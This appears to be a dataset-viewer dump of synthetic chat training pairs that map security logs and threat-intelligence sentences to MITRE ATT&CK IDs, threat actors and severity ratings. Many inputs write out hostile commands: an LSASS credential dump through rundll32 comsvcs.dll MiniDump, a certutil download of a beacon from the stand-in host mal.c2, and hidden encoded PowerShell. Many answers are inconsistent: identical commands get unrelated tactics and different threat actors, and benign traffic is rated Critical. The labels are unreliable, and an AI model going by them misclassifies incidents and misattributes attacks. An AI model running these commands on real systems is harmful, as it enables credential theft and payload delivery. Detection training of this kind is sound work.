messages
listlengths
2
2
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 2142 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.4.212.138", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0008\"], \"techniques...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor for file creation and files transferred into the network", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3690 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.134.19.192", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0004\"]...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Disable the RDP service if it is unnecessary.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1563.002\", \"T1021.001\", \"T1021\", \"T1563\"]}", "role": "assistant" ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-K31HRS65EW)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\": \"Cri...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: overwrite or delete MBR in same sentence", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1561\", \"T1561.002\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Persistence Once started, the Keydnap backdoor installs a plist file in /Library/LaunchAgents/ if it has root privileges or $USER/Library/LaunchAgents/ otherwise to achieve persistence across reboots", "role": "u...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1058 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.104.53.102", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techn...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.119.243.7", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0008\"], \"technique...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-Y4PJ6U3P4U)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severit...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\": \"Hig...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-ZE9RT6XN0Q)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Persistence, Defense Evasion", "role": "user" }, { "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-OXG8DD43VE)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Credential Access, Persistence", "role": "use...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Enable the UpdateFolderPermissions action for all logon types.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1098.002\", \"T1098\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-QYF6XOUWDC)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Impact", "role": "user" }, { "content": "{\"severi...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2096 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.77.253.68", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0004\", \"TA0010\"], \"te...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-RD5M0GYBO9)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Persistence, Lateral Movement", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.186.240.16", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains.", "role": "u...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CARROTBAT has the ability to delete downloaded files from a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: NotPetya drops PsExec with the filename dllhost.dat.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Okrum has used a custom implementation of AES encryption to encrypt collected data.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1560.003\", \"T1560\"]}", "role": "assis...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.187.174.204", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0002\"], \"techniq...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-LKLP44K7OM)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Credential Access", "role": "user" }, { "content...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: It can also use GetDriveType to determine if a new drive is a CD-ROM drive.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Specifies the screen coordinates to take -zip Name of password (from configuration data) protected zip archive -clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-AENS0LH31R)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Impact, Discovery", "role": "user" }, { "content...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-22JO9XQOS0)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"Critical...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"co...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2902 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.123.141.1", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\",...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.146.35.190", "role": "user" }, { "content": "{\"tactics\": ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-5YVBIY7JHA)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Impact, Exfiltration", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2612 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confiden...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-IDRCXNBKZ4)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Discovery, Lateral Movement", "role": "user" }, ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Applying SID Filtering to domain trusts within a single forest is not recommended as it is an unsupported configuration and can cause breaking changes.", "role": "user" }, { "content": "{\"tactics\": [\"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-E4AGP2DNSN)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Reconnaissance, Collection", "role": "user" }, { "content": "{\"seve...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3380 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.134.98.155", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0010\", \"TA0005\"], ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, JA3 Spoof, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": \...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3391 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.100.94.98", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1071.001...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Examples of cloud storage services include Dropbox and Google Docs.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1567.002\", \"T1567\"]}", "role": "assistant" } ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2992 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.141.203.79", "role": "user" }, { "content": "{\"tactics\": [\"TA0003...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Patchwork has used BITS jobs to download malicious payloads.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0005\"], \"techniques\": [\"T1197\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage Patch System Image due to the monolithic nature of the architecture.", "role": "user" }, { "content": "{\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 713 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.62.99.61", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0011\"], \"techniques\": [\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.62.28.85", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1137\", \"T1137.004\"]}", "role": ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.97.105.106", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0004\"], \"techniques\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered Spid...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1276 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Rancor has used cmd.exe to execute commmands.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1137 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", ...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: lists the running processes", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3383 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.14.235.244", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0001\"], ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 641 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.56.50.203", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0005\"], \"techniques\": [\"T1...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2941 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: SysUpdate can delete its configuration file from the targeted system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-NQSW27BJSG)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Exfiltration", "role": "user" }, { "conten...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-GE0ERAC8SS)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Credential Access, Exfiltration", "role": "user" }, { "content": "{\"sev...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1201...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-YW42K225A1)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Critical\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-RR0Z2W59FI)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Execution, Reconnaissance", "role": "user" }, { "content": "{\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1295 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confiden...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: FELIXROOT executes batch scripts on the victim’s machine, and can launch a reverse shell for command execution.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: AppleSeed has the ability to rename its payload to ESTCommon.dll to masquerade as a DLL belonging to ESTsecurity.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036.005\", \"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: BackConfig has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1137\", \"T1137....
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3068 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.123.178.67", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"]...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 910 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confide...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: GravityRAT uses the netstat command to find open ports on the victim’s machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1049\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.53.78.84", "role": "user" }, { "content": "{\"tactics\": [\"TA0005...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-INPZIKP4QW)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\": \"Ext...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.64.195.213", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0005\"], \"techniques\": [\"T1566.00...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3934 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"c...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: All of the backdoors identified - excluding RoyalDNS - required APT15 to create batch scripts in order to install its persistence mechanism", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for the usage of unexpected or unusual cookies to access resources and services.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1606\", \"T1606.001\"]}", "role": "assistant" ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: APT32 has moved and renamed pubprn.vbs to a .txt file to avoid detection.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036.003\", \"T1036\"]}", "role": "assistant...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.149.221.199", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0007\"], \"tec...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor newly executed processes, such as eventvwr.exe and sdclt.exe, that may bypass UAC mechanisms to elevate process privileges on system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA000...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.16.175.91", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniqu...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2451 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.56.87.168", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor executed commands and arguments that may acquire credentials from web browsers by reading files specific to the target browser.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: [random_name].plist in the /Library/LaunchDaemons folder with the RunAtLoad and KeepAlive keys set to true.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.004...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spid...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.182.172.82", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0011\", \"TA0005\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"co...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.190.133.62", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: FIN7 has used mshta.exe to execute VBScript to execute malicious code on victim systems.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218.005\", \"T1218\"]}", "role": "assistant" ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-QCI1A9RLLV)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution, Defense Evasion, Collection", "role": "user" }, { "conten...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.171.208.57", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-60HEVTS0PU)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Execution, Discovery", "role": "user" }, { "content": "{\"severi...